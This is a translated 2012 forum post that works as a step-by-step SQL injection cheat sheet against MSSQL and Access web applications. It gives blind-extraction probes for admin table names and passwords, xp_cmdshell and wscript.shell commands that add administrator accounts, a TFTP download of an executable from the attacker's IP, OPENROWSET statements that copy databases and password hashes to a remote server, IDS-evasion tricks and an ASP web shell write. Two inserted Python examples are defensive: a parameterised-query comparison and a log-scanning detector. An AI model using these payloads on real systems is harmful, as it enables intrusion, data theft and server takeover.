SQL Injection Statements 2

Original poster, posted 2012-9-15 14:32:40
1. Check whether an injection point exists
and 1=1 and 1=2

2. Guess table names. The usual table names are admin, adminuser, user, pass, password, etc.
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- checks whether the admin table exists

3. Guess the number of accounts. If 0< returns the normal page and 1< returns the error page, there is exactly one account.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
Column names can also be guessed with: and (select count(列名) from 表名)>0

4. Guess field names: put the field name you have in mind inside the len( ) parentheses.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(密码字段名称password)>0)

5. Guess the length of each field: vary the value after > until the normal page comes back.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)   error
and 1=(select count(*) from admin where len(name)>5)   normal, so the length is 6
and 1=(select count(*) from admin where len(name)=6)   normal

and 1=(select count(*) from admin where len(password)>11)   normal
and 1=(select count(*) from admin where len(password)>12)   error, so the length is 12
and 1=(select count(*) from admin where len(password)=12)   normal
Length can also be guessed with: and (select top 1 len(username) from admin)>5

6. Guess the characters
and 1=(select count(*) from admin where left(name,1)=a) --- guesses the first character of the user account
and 1=(select count(*) from admin where left(name,2)=ab) --- guesses the second character of the user account
Keep adding one character at a time; once you reach the length you guessed earlier, the account name is complete.

Content can also be guessed with: and (select top 1 asc(mid(password,1,1)) from admin)>50   using ASCII codes
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query can also guess Chinese user names and passwords: just replace the trailing number with the ASCII code of the Chinese character, then convert the results back to characters.
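Added example, not from the original post: the query-construction pattern steps 1-3 depend on (the raw id parameter spliced into SELECT ... WHERE id=...) next to its parameterised form, with the post's own probes run against both. The news/admin tables are constructed in SQLite so it runs offline; the post itself targets MSSQL.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the news/admin tables the post
    queries. The post targets MSSQL; SQLite is used so the example runs offline."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (12, 'release notes');
        CREATE TABLE admin(name TEXT, password TEXT);
        INSERT INTO admin VALUES ('root', 'hunter2hunter');
    """)
    return db

def vulnerable_lookup(db, id_param: str):
    # The pattern behind "SELECT * FROM news WHERE id=...": the raw parameter is
    # spliced into the statement, so "12 and 1=2" becomes part of the WHERE clause.
    return db.execute("SELECT title FROM news WHERE id=" + id_param).fetchall()

def safe_lookup(db, id_param: str):
    # Hardened form: validate the type, then bind the value as a parameter so
    # the database engine never parses it as SQL.
    if not id_param.isdigit():
        raise ValueError("id must be an integer")
    return db.execute("SELECT title FROM news WHERE id=?", (int(id_param),)).fetchall()

def page_is_normal(lookup, db, probe: str) -> bool:
    """The side channel steps 1-3 rely on: does id=12 AND <probe> still return
    the row (normal page) or not (error / empty page)?"""
    try:
        return len(lookup(db, "12 and " + probe)) == 1
    except (sqlite3.Error, ValueError):
        return False

PROBES = ("1=1", "1=2", "0<(select count(*) from admin)", "1<(select count(*) from admin)")

def compare():
    """Run the post's probes against both lookups. The vulnerable one leaks one
    bit per request (the answers differ); the safe one rejects every probe."""
    db = make_db()
    return ([page_is_normal(vulnerable_lookup, db, p) for p in PROBES],
            [page_is_normal(safe_lookup, db, p) for p in PROBES])

if __name__ == "__main__":
    vuln, safe = compare()
    for probe, v, s in zip(PROBES, vuln, safe):
        print(f"{probe:35s} vulnerable={v!s:5s} safe={s}")
```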

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )--

UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

Check which service pack the server has: an error means SP4 is installed
and 1=(select @@VERSION)--

Check the privileges of the database connection account: a normal page proves it has the sysadmin server role.
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

Determine the account used to connect to the database (connected as SA: a normal page proves the connection account is SA)
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0<>(select user_name()--

Check whether xp_cmdshell has been removed
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--

If xp_cmdshell has been removed, restore it; restoring from an absolute path is supported
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--

Reverse-ping test against your own host
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

Add an account
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--

Create a virtual directory mapped to drive E:
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--

Access properties (used together with writing a webshell):
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

MSSQL can also use UNION queries
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin   (union works fine with Access too)

Database-path disclosure trick: %5c=\ , or change / and \ to %5 and submit

Getting the web path
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- create a table cmd with an image-type column

Test procedure when xp_cmdshell exists:
;exec master..xp_cmdshell dir
;exec master.dbo.sp_addlogin jiaoniang$;-- add a SQL account
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
exec master..xp_servicecontrol start, schedule   start the service
exec master..xp_servicecontrol start, server
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_cmdshell tftp -i youip get file.exe-- upload a file via TFTP

;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
Can be used when restricted.
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)

Query construction:
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;--
;use master;--
:a or name like fff%;-- shows that there is a user called ffff.
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
The statements above fetch the first user table in the database and put its name into the email field of user ffff.
Viewing ffff's profile then shows that the first user table is called ad.
From the table name ad you get that table's ID, and from that the name of the second table.

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, admin--, password, 0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 // for Access databases

Enumerating table names
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
This writes the first table name into the aaa field.
That reads the first table; the second can be read the same way (append and name<> the table name just obtained to the condition).
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
Then id=1552 and exists(select * from aaa where aaa>5)
reads the second table; read them one by one until there are none left.
Reading fields works like this:
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
Then id=152 and exists(select * from aaa where aaa>5) raises an error, which gives the field name
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
Then id=152 and exists(select * from aaa where aaa>5) raises an error, which gives the field name

[Getting table names][update a field value to the table name, then find a way to read that field's value to get the table name]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
Creating a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current account must be in the SYSADMIN group]

[Getting table field names][update a field value to the field name, then find a way to read that field's value to get the field name]
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]

Bypassing IDS detection [using variables]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
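Added defender-side example, not part of the original post: a small scanner that URL-decodes the request line, undoes the quote-and-concatenation variable trick shown above (so 'xp'+'_cm'+'dshell' and xp_+cmdshell both collapse to xp_cmdshell before matching), and flags the MSSQL primitives this cheat sheet relies on. The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote, unquote_plus

# Signature families taken from the primitives listed in the post above:
# boolean-blind probes, system-table reads, role checks, extended procedures,
# OLE automation, OPENROWSET pivoting, backups and privilege grants.
SIGNATURES = {
    "boolean_blind": r"\band\s+\d+\s*(?:=|<>|<|>)\s*\(?\s*(?:\d+|select\b)",
    "metadata_read": r"\b(?:sysobjects|sysxlogins|syscolumns|information_schema\.columns)\b",
    "role_check": r"\bis_(?:srvrolemember|member)\s*\(",
    "extended_proc": r"\bxp_(?:cmdshell|dirtree|subdirs|regread|availablemedia|servicecontrol)\b",
    "ole_automation": r"\bsp_oa(?:create|method|setproperty)\b",
    "linked_pivot": r"\bopenrowset\s*\(",
    "backup_to_disk": r"\bbackup\s+database\b",
    "priv_grant": r"\bsp_(?:addlogin|addsrvrolemember|addextendedproc|password)\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in SIGNATURES.items()}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')

def normalize(raw: str) -> str:
    """Undo the encodings an attacker controls before matching: URL decoding
    (twice, so double-encoded input is caught), comment stripping, and the
    quote/concatenation variable trick ('xp'+'_cm'+'dshell') from the post."""
    s = unquote(unquote_plus(raw))
    s = re.sub(r"/\*.*?\*/", " ", s)                     # /* inline comments */
    s = re.sub(r"['\u2019]\s*\+\s*['\u2019]", "", s)     # 'a'+'b' -> 'ab'
    s = s.replace("'", "").replace("\u2019", "")         # drop remaining quotes
    s = re.sub(r"(?<=\w)\s*\+\s*(?=\w)", "", s)          # xp_+cmdshell -> xp_cmdshell
    return re.sub(r"\s+", " ", s).strip().lower()

def scan(lines):
    """Return [(line_number, [matched families])] for suspicious request lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        text = normalize(m.group(1))
        families = [name for name, rx in COMPILED.items() if rx.search(text)]
        if families:
            hits.append((n, families))
    return hits

# Constructed sample access-log lines (not real traffic); the payloads mirror
# steps 1-3, the sysadmin role check and the IDS-evasion variable trick above.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Sep/2012:14:32:40 +0800] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [15/Sep/2012:14:33:02 +0800] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 500 312',
    '10.0.0.9 - - [15/Sep/2012:14:33:10 +0800] "GET /news.asp?id=12%20and%201=(select%20count(*)%20from%20admin) HTTP/1.1" 200 5120',
    '10.0.0.9 - - [15/Sep/2012:14:34:51 +0800] "GET /news.asp?id=12%20and%201=(SELECT%20IS_SRVROLEMEMBER(%27sysadmin%27))-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [15/Sep/2012:14:35:07 +0800] "GET /news.asp?id=12;declare%20@a%20sysname%20set%20@a=%27xp%27%2B%27_cm%27%2B%27dshell%27%20exec%20@a%20%27dir%20c:%5C%27-- HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for n, families in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(families)}")
```

Matching on the normalised text rather than the raw request is the point: the two variable-based forms from the post are invisible to a plain substring match for xp_cmdshell.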
1. Opening a remote database
Basic syntax
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
Parameters: (1) OLEDB Provider name
2. The connection string parameter can connect through any port, for example
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
3. Copy the target host's entire database: insert all remote tables into local tables.

Basic syntax:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
This statement copies all data from table2 on the target host into table1 in the remote database. In practice, adjust the IP address and port in the connection string to point where you need, for example:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
select * from user_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
select * from user_database.dbo.syscolumns
Copying a database:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2

Copying the hash table (HASH): login password hashes are stored in sysxlogins. Method:
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
Once you have the hashes you can brute-force them.

Directory traversal method: first create a temporary table, temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- get all current drives
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- get the list of subdirectories
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- get the directory tree of all subdirectories and store it in the temp table
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- view the contents of a file
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree is usable with PUBLIC privileges)
Writing to a table:
Statement 1: and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
Statement 2: and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
Statement 3: and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
Statement 4: and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
Statement 5: and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
Statement 6: and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
Statement 7: and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
Statement 8: and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
Statement 9: and 1=(SELECT IS_MEMBER(db_owner));--

Writing paths into a table:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--

Back up the database into the web directory, then download it:
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects)   see the related table.
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)

-=- wscript.shell example -=-
declare @o int
exec sp_oacreate wscript.shell, @o out
exec sp_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject, @o out
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, readline, @line out
end

declare @o int, @f int, @t int, @ret int
exec sp_oacreate scripting.filesystemobject, @o out
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_oamethod @f, writeline, NULL,
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>

declare @o int, @ret int
exec sp_oacreate speech.voicetext, @o out
exec sp_oamethod @o, register, NULL, foo, bar
exec sp_oasetproperty @o, speed, 150
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
waitfor delay 00:00:05

; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--

xp_dirtree is usable with PUBLIC privileges
exec master.dbo.xp_dirtree c: returns two columns, subdirectory and depth. The subdirectory column is a character type; depth is an integer column.
create table dirs(paths varchar(100), id int)
Create the table; the one created here corresponds to the xp_dirtree output above, with the same number of columns and the same types.
insert dirs exec master.dbo.xp_dirtree c: As long as the table we create has column definitions matching what the stored procedure returns, it executes. That achieves the effect of writing into a table and, step by step, gets us the information we want.